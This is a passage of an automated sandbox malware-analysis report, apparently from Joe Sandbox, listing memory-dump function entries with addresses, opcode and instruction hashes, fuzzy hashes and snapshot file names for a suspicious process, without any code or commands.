                                                            • Opcode ID: 607a3deceb6852d5288b94f2c8b9b075914afb68c719db66ca5244cb50052f0a
                                                            • Instruction ID: 0268459102ce0c551be7b4bb65256f8e7f6a4332d8e466b57c9c7ba72adca42b
                                                            • Opcode Fuzzy Hash: 607a3deceb6852d5288b94f2c8b9b075914afb68c719db66ca5244cb50052f0a
                                                            • Instruction Fuzzy Hash: 57C01200F0B40E01E43133AA14620ACA2025BC4E18FD30032D00C800A198DD22C901AA
                                                            Function 00007FFD9BAA308E Relevance: .0, Instructions: 11COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1980435687.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9baa0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d8eb447ebd7bbe65cb2018bea1b70ca35f0fe5fe3d0c5337cced9014e83b2f9b
                                                            • Instruction ID: a6576874de33ed06f4d98f5ffafd9bbb7056a6186c281d7f2bbaabebef240324
                                                            • Opcode Fuzzy Hash: d8eb447ebd7bbe65cb2018bea1b70ca35f0fe5fe3d0c5337cced9014e83b2f9b
                                                            • Instruction Fuzzy Hash: 62C0EA14F2A91E5AEAF8A7A480756B911C36F45B00F460578904ED32E2DDAC7A408AA5
                                                            Function 00007FFD9BAA34BF Relevance: .0, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1980435687.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9baa0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 03c07ba3d503f8148af44623eebea4f7c56472a5d8ddb6cbcfa72f082278d017
                                                            • Instruction ID: 8fe0ffd60fda3517722ea413d2fee838bd8bda109d290d3b0cf1838e5e7cb457
                                                            • Opcode Fuzzy Hash: 03c07ba3d503f8148af44623eebea4f7c56472a5d8ddb6cbcfa72f082278d017
                                                            • Instruction Fuzzy Hash: A8C04C01F1CC2A17F66966144C2567E04535F5472DFD901B4E41FC73DECD5D5E0206D6
                                                            Function 00007FFD9BAA06C8 Relevance: .0, Instructions: 8COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1980435687.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9baa0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1331302ace8906dc7ff6d84222f3b4709e12167f194fc678014da51f1390e612
                                                            • Instruction ID: 5d4eb65805904c88ee28bc93bcbdd05bedc58eeb57ca7ffbcbff11d570561cfa
                                                            • Opcode Fuzzy Hash: 1331302ace8906dc7ff6d84222f3b4709e12167f194fc678014da51f1390e612
                                                            • Instruction Fuzzy Hash: DFB01200D5B44F01E43433FB089206874415B44204FC20070D40CC019198CD22D802A7
                                                            Function 00007FFD9BAA6A8C Relevance: .0, Instructions: 7COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1980435687.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9baa0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cac71e77d6b68aa96a6892ae0be65438d06d493e10b968ad6f9787162aca6423
                                                            • Instruction ID: 8c43bb75ea278a86393614c8a78f3bb6d6f876162e107514682160d96059ff44
                                                            • Opcode Fuzzy Hash: cac71e77d6b68aa96a6892ae0be65438d06d493e10b968ad6f9787162aca6423
                                                            • Instruction Fuzzy Hash: 4EB09201F0E12B56F1B003E4026927902D34F64784F0B0438E80CC61F2FDDDAE010066

                                                            Non-executed Functions

                                                            Function 00007FFD9BAA09B0 Relevance: 5.2, Strings: 4, Instructions: 195COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1980435687.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9baa0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: c9$!k9$"s9$#{9
                                                            • API String ID: 0-1692736845
                                                            • Opcode ID: cb88ab6d95ab85b49039db9082cebfb02cedc4d518de146a2e869499167111c5
                                                            • Instruction ID: e1a95792946ef8f847ff6465fc7ab025d94a6d83d403f436d8d0e3fa9b867144
                                                            • Opcode Fuzzy Hash: cb88ab6d95ab85b49039db9082cebfb02cedc4d518de146a2e869499167111c5
                                                            • Instruction Fuzzy Hash: 2051BD17B0942745E339B3FD78219E96B449FA823FB0847B7F95E8D0C78C086486C2E9

                                                            Executed Functions

                                                            Function 00007FFD9BAA0D48 Relevance: 1.5, Strings: 1, Instructions: 261COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 5[_H
                                                            • API String ID: 0-3279724263
                                                            • Opcode ID: a87ea84665323a5c20f2b3673ad0141311efdd2d23ecd8d5bdbbb109eb604abd
                                                            • Instruction ID: be4786f5eba562b1326f63ffe8517bd55ce4c12cc5fd14e14c5b3200f2040df9
                                                            • Opcode Fuzzy Hash: a87ea84665323a5c20f2b3673ad0141311efdd2d23ecd8d5bdbbb109eb604abd
                                                            • Instruction Fuzzy Hash: B1911372B19A8D4FE799DB6888657A97FE1FFA5310F0101BED149DB2E2CAB818448700
                                                            Function 00007FFD9BAD1441 Relevance: .5, Instructions: 469COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bad1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3489494284b910247b47c742b7e7910088dc7a4b4475a71e34a7d7a71aaf045a
                                                            • Instruction ID: cdb0ac652b6c16af3a09aba2ebea1c3c87bf18c9c1433815da8116a6f7b1651e
                                                            • Opcode Fuzzy Hash: 3489494284b910247b47c742b7e7910088dc7a4b4475a71e34a7d7a71aaf045a
                                                            • Instruction Fuzzy Hash: 7DD16E21B2E78D0BE32D8A684C920B57791EFE2205B1987BDD5DFC7097D97CA5078381
                                                            Function 00007FFD9BAD1475 Relevance: .3, Instructions: 322COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bad1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f09e576917ae001dbe34211c4fd4dab1f7966536b14612556593d13e8ec416ef
                                                            • Instruction ID: cdbf31376c7f3ca82b963a3af8f21dc0ed4cd2ebe94caa0a2dffe61c67211794
                                                            • Opcode Fuzzy Hash: f09e576917ae001dbe34211c4fd4dab1f7966536b14612556593d13e8ec416ef
                                                            • Instruction Fuzzy Hash: 75819E71F2D35E0BE32C8A684C9207137D5EBE6216B1A877DD9DFC3197D868B9074281
                                                            Function 00007FFD9BACD5A9 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bac3000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: M
                                                            • API String ID: 0-3664761504
                                                            • Opcode ID: e3da3250f8a952a432e4e4f4ae42b29523072ea1052ad2eff0538366a8540c0e
                                                            • Instruction ID: 3a7dc8bd3bfd12e319ddaaa5dce87e7c9e7dc72e6197c68f4e0fb0996ddfbaca
                                                            • Opcode Fuzzy Hash: e3da3250f8a952a432e4e4f4ae42b29523072ea1052ad2eff0538366a8540c0e
                                                            • Instruction Fuzzy Hash: 49215A61A4F3C90FD717A7B848384A4BFB0DE53204B4A41FBC0C9CB1E3E929994AC312
                                                            Function 00007FFD9BAD1F8F Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bad1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: M
                                                            • API String ID: 0-3664761504
                                                            • Opcode ID: 0988b520bf36720074290b4f9fcdb710159774e90dfd87d8cc8228985839bf6c
                                                            • Instruction ID: cdcfc39688d2d2f1a6f73dd7b5dcb403a8d164ad2abd99617c32dff0e906eb2d
                                                            • Opcode Fuzzy Hash: 0988b520bf36720074290b4f9fcdb710159774e90dfd87d8cc8228985839bf6c
                                                            • Instruction Fuzzy Hash: F4118F2054F3C19FCB17973488689957FA0AF53215B0E46EED089CF0B3DA6D494AC712
                                                            Function 00007FFD9BADA7C9 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bad1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: M
                                                            • API String ID: 0-3664761504
                                                            • Opcode ID: 2b2e9e675e9fda10dfcc35592366e1560628dddb8ffdf8b868f72bf72621980d
                                                            • Instruction ID: 4b691a84aa55324a6fada8ffa6b2d51747664d851721ac833ca502820b9a7b54
                                                            • Opcode Fuzzy Hash: 2b2e9e675e9fda10dfcc35592366e1560628dddb8ffdf8b868f72bf72621980d
                                                            • Instruction Fuzzy Hash: 40E06D7160B7C44FDB1AAA3488698547FB0EF6725174A52EEC046CB1A3EA2D988AC701
                                                            Function 00007FFD9BADA739 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bad1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: M
                                                            • API String ID: 0-3664761504
                                                            • Opcode ID: 63218a44874633beecc5e1481bf086e7d47d8054a94b427ccf30b4a1497d3ff8
                                                            • Instruction ID: 9aceb90435605f060fdc96c5f08e7293f415da4b3538d590ec2a9900c18dd7c6
                                                            • Opcode Fuzzy Hash: 63218a44874633beecc5e1481bf086e7d47d8054a94b427ccf30b4a1497d3ff8
                                                            • Instruction Fuzzy Hash: 31F06D7160F7C44FDB1AAB348869854BFB0EF6720174A52EFC045CF1A3EA2D9889C711
                                                            Function 00007FFD9BACE749 Relevance: 1.3, Strings: 1, Instructions: 27COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bac3000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: M
                                                            • API String ID: 0-3664761504
                                                            • Opcode ID: 99b7cbae7a79633cbf4d83eca1d4e6ace1150fcd1646e4a0a5f23ded423b0303
                                                            • Instruction ID: 7dc62515e5a25d0cf39fa37612e37d6b0704086f294050e2e80564c1bb7433e8
                                                            • Opcode Fuzzy Hash: 99b7cbae7a79633cbf4d83eca1d4e6ace1150fcd1646e4a0a5f23ded423b0303
                                                            • Instruction Fuzzy Hash: 34E0927160E3C44FCB1AEA3488688557FA0EF6721174A41EEC046CF2A7EA2DCC85CB11
                                                            Function 00007FFD9BACD639 Relevance: 1.3, Strings: 1, Instructions: 27COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bac3000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: M
                                                            • API String ID: 0-3664761504
                                                            • Opcode ID: 281a4a4e1e53048b3a0d9c9b9a792fb829dc35484670c05a37bbe5055c9a8c79
                                                            • Instruction ID: 8fb49fc0c64e48284013756920b368e82cdb6fbb8fa62bd0970d1960c763347a
                                                            • Opcode Fuzzy Hash: 281a4a4e1e53048b3a0d9c9b9a792fb829dc35484670c05a37bbe5055c9a8c79
                                                            • Instruction Fuzzy Hash: C7E09B7164A3C44FCB16963444684547F60EF6720174651FEC046CF1A7EE2DC846C701
                                                            Function 00007FFD9BAD2049 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bad1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: M
                                                            • API String ID: 0-3664761504
                                                            • Opcode ID: 415bd347d64a1418ce9e73fad9c43201355d73a6e7bde519eccb86d30cb3cb2c
                                                            • Instruction ID: 60568fc3ed2c46f7c13e7c163899376ddbc296e11125522509f95c0dc0b45700
                                                            • Opcode Fuzzy Hash: 415bd347d64a1418ce9e73fad9c43201355d73a6e7bde519eccb86d30cb3cb2c
                                                            • Instruction Fuzzy Hash: A6E0927164E3C08FCB16EB34846C8547F60EE6720174A42EEC046CF2A3EA2DC886C711
                                                            Function 00007FFD9BAD8509 Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bad1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: I
                                                            • API String ID: 0-3707901625
                                                            • Opcode ID: d2d33003824b740559f5215b5f1fea58e43a21ef9a0563d1c9593224ee5f3aa8
                                                            • Instruction ID: 53ce392930617d1a8745d219a18219cc2919e32d49b152bcd885b84858371cf5
                                                            • Opcode Fuzzy Hash: d2d33003824b740559f5215b5f1fea58e43a21ef9a0563d1c9593224ee5f3aa8
                                                            • Instruction Fuzzy Hash: FDE01A7154E3C44FCB0AAB7488658553FA09E6721078B40EEC186CF1B3E62D8949C701
                                                            Function 00007FFD9BADAFB9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bad1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: I
                                                            • API String ID: 0-3707901625
                                                            • Opcode ID: f3fc6ce4eb592dd6560b152c03c137b1cd02e615c457cd572b957e3192a89807
                                                            • Instruction ID: ea6a32ed59c3f866ef6a8ee44195390a64c7a3f9bf60a799dc4e07935f10a712
                                                            • Opcode Fuzzy Hash: f3fc6ce4eb592dd6560b152c03c137b1cd02e615c457cd572b957e3192a89807
                                                            • Instruction Fuzzy Hash: 1BE0E5A154F7C44FCB16AB75886A9457FA0AE6B21078A41EEC185CB1B3EA298849C701
                                                            Function 00007FFD9BAD20D9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bad1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: I
                                                            • API String ID: 0-3707901625
                                                            • Opcode ID: 43e5185a7d0cb2fedfddd3b3b1f84935eefc40eef69d0f9f0bacb548a3a1211e
                                                            • Instruction ID: f57ad5038fb666fed311e58073aea0cd603fee516e5da23ec3e134c2db5bf561
                                                            • Opcode Fuzzy Hash: 43e5185a7d0cb2fedfddd3b3b1f84935eefc40eef69d0f9f0bacb548a3a1211e
                                                            • Instruction Fuzzy Hash: C1E01A6154F7C44FCB16EB74886A9447FA0AE6B31178B41EEC089CF1B3E62E9849C701
                                                            Function 00007FFD9BAB0906 Relevance: .9, Instructions: 871COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bab0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9e0e97ed55709a26054b9ceef4916b93214d85faec1198f52250647ff0601ccf
                                                            • Instruction ID: 353a95b2223be90bb104e089b81711722730eec4fcee5ece6bef2425e6d94e4c
                                                            • Opcode Fuzzy Hash: 9e0e97ed55709a26054b9ceef4916b93214d85faec1198f52250647ff0601ccf
                                                            • Instruction Fuzzy Hash: 8E52D631B19A5E4FEBA8EB5884A16B873D2FF64710F0106B9D01ED32D6DE74BD818B41
                                                            Function 00007FFD9BAB15F8 Relevance: .7, Instructions: 723COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bab0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7d8faf6fbe24f82b415f44fcdfe78abb714d9d5cfd7fd6a4e8890cfc30b4613f
                                                            • Instruction ID: daf6a8eac5fd5d85c293e81151148c068627d81cc1f89f8a2d109fb27330b2a1
                                                            • Opcode Fuzzy Hash: 7d8faf6fbe24f82b415f44fcdfe78abb714d9d5cfd7fd6a4e8890cfc30b4613f
                                                            • Instruction Fuzzy Hash: 8F32D531B19A5A4BEBA8EB5884A167873D2FF68700F0506BDD05EC31D7DE74B9818B41
                                                            Function 00007FFD9BAB0DC7 Relevance: .6, Instructions: 562COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bab0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7be85bd83afc748aa6526aa77089218770b5da251c9149ad62155fda747daf28
                                                            • Instruction ID: d1d8bded0bf139a078fb1673758683f383b9810cfacea8db99c473e643e8b98f
                                                            • Opcode Fuzzy Hash: 7be85bd83afc748aa6526aa77089218770b5da251c9149ad62155fda747daf28
                                                            • Instruction Fuzzy Hash: C302E431F29A5A4FEB68DB58846577873A2FFA4700F1105B9D01EC72E6DE74BD828B40
                                                            Function 00007FFD9BAB0FA9 Relevance: .5, Instructions: 486COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bab0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a3131cd1f0452d9047671f2c573d76302a9177a2994b05d443836e07374f364b
                                                            • Instruction ID: e3149a2865196f1b69daa37192bd0323fb6bec1cb830701681c01defd5782552
                                                            • Opcode Fuzzy Hash: a3131cd1f0452d9047671f2c573d76302a9177a2994b05d443836e07374f364b
                                                            • Instruction Fuzzy Hash: 28F1B631F2995A4FEB68DB5884A577873A2FFA4700F1106B9D01EC72D6DE74BD828B40
                                                            Function 00007FFD9BAD377D Relevance: .3, Instructions: 289COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bad1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6b994a4c199ed5a6ac0b2785444136facb194a242f590a9d60e94903d301e0cd
                                                            • Instruction ID: 92286fde73ac0b192ac3226c5b2ab647de754bbc09831e86d0e6c00c81bee134
                                                            • Opcode Fuzzy Hash: 6b994a4c199ed5a6ac0b2785444136facb194a242f590a9d60e94903d301e0cd
                                                            • Instruction Fuzzy Hash: 2A91F421B1DA4E0FEBA8EB5884767B973D2EF98354F0443B9E40DC72E7DD68A9458340
                                                            Function 00007FFD9BAC93D3 Relevance: .2, Instructions: 205COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bac3000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7b7e910faa33f5aececaf36e9feeff2979c4e38ee750ebff0db8d37f64f06b92
                                                            • Instruction ID: 3f38580ef97b36419f6082f2ef630b7f954d73be71af7ea4916359d0005bf40d
                                                            • Opcode Fuzzy Hash: 7b7e910faa33f5aececaf36e9feeff2979c4e38ee750ebff0db8d37f64f06b92
                                                            • Instruction Fuzzy Hash: 7461D630B199094FDB59EB68C4A5AB973E2FF98314F1146B9E00DC72D6CE38E9428741
                                                            Function 00007FFD9BAC946D Relevance: .2, Instructions: 152COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bac3000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cd0307f103ac3baf04c07ebd6f92451abcb62e91360271285c2ec615aae7a1bc
                                                            • Instruction ID: f95778116b1f0252dba4c5eb1863393256a9ec1bd4f17d970f91721847734072
                                                            • Opcode Fuzzy Hash: cd0307f103ac3baf04c07ebd6f92451abcb62e91360271285c2ec615aae7a1bc
                                                            • Instruction Fuzzy Hash: B8419330B1890D8FDB55EF6DC458AA973E1FF98310F5102B9D01DC76E5CB39A9818780
                                                            Function 00007FFD9BAA0910 Relevance: .2, Instructions: 152COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 49d52f98305bd6c8a9d9f33adfb291bb8dadb3a5ef6adcc5ba04f40c70285683
                                                            • Instruction ID: da832a57e59ceb861436cda4055b48d16484e73d12baf7c8a32d32319580f06a
                                                            • Opcode Fuzzy Hash: 49d52f98305bd6c8a9d9f33adfb291bb8dadb3a5ef6adcc5ba04f40c70285683
                                                            • Instruction Fuzzy Hash: BD412512B0C9590FE318B7BCA4A5AF87781EF5933AB1406FBE44ECB1E7CD14A8418284
                                                            Function 00007FFD9BADB58C Relevance: .1, Instructions: 129COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bad1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c834f56c941669759944b2535218cf64922c7becfff37d9898d62163d396fec1
                                                            • Instruction ID: 133abc7c1e0dd37b8c2d8219c9b5a2c7f6f80df3527cc92c354329e991ec6726
                                                            • Opcode Fuzzy Hash: c834f56c941669759944b2535218cf64922c7becfff37d9898d62163d396fec1
                                                            • Instruction Fuzzy Hash: 5D311621B19D4E0FEBA4D75C98AA7A873D1EFA8750F8503BAE01DC71E2DD34B9414741
                                                            Function 00007FFD9BAA0960 Relevance: .1, Instructions: 117COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9c52b5ab67f0b43a24563ba67c91a7cea9260ada3764529c4b7538a8beeb8bbb
                                                            • Instruction ID: 4a0ad5af91269a95306922904d81564d3fe995a47f221ce5543937ed52bc54be
                                                            • Opcode Fuzzy Hash: 9c52b5ab67f0b43a24563ba67c91a7cea9260ada3764529c4b7538a8beeb8bbb
                                                            • Instruction Fuzzy Hash: AB31F711B0C91D0FE768BB6C6466AF573C2DF9833AB1446FAE40EC72E7DD18AC418295
                                                            Function 00007FFD9BAA0998 Relevance: .1, Instructions: 93COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3d0a4a60f5781b054e7cf7d172a6cf926834e6e842dd0d2da0f75a92758ebca7
                                                            • Instruction ID: 88db901a345b7cad395d39bd9b168e211db0db01ab64f653011d0e8c6c74b911
